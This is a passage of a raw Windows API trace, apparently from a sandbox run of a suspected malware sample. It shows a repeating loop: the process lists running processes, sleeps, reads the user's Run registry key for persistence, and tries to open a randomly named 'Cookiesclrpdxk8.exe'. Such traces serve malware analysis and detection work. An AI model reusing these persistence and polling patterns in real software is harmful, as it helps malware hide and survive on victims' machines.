(HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0299.154] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.154] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.154] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0299.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0299.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0299.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0299.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0299.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0299.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0299.254] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0299.255] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0299.256] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0299.256] NtClose (Handle=0x338) returned 0x0 [0299.256] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.256] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.256] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0299.256] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.256] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.257] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0299.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0299.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0299.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0299.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0299.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0299.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0299.357] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0299.359] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0299.360] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0299.360] NtClose (Handle=0x338) returned 0x0 [0299.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.360] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.360] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de420) returned 1 [0299.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.360] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.360] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0299.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0299.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0299.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0299.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0299.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0299.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0299.462] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0299.463] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0299.464] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0299.464] NtClose (Handle=0x338) returned 0x0 [0299.464] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.464] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.465] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0299.465] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.465] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.465] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0299.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0299.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0299.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0299.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0299.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0299.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0299.568] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0299.571] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0299.572] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0299.572] NtClose (Handle=0x338) returned 0x0 [0299.573] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.573] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.573] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0299.573] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.573] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.573] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0299.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0299.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0299.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0299.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0299.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0299.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0299.711] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0299.712] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0299.713] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0299.713] NtClose (Handle=0x338) returned 0x0 [0299.713] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.713] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.714] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0299.714] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.714] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.714] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0299.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0299.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0299.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0299.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0299.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0299.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0299.874] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0299.875] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0299.876] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0299.876] NtClose (Handle=0x338) returned 0x0 [0299.876] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.877] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.877] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0299.877] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.877] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0299.877] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0299.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0299.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0299.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0299.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0299.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0299.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0299.983] NtDelayExecution 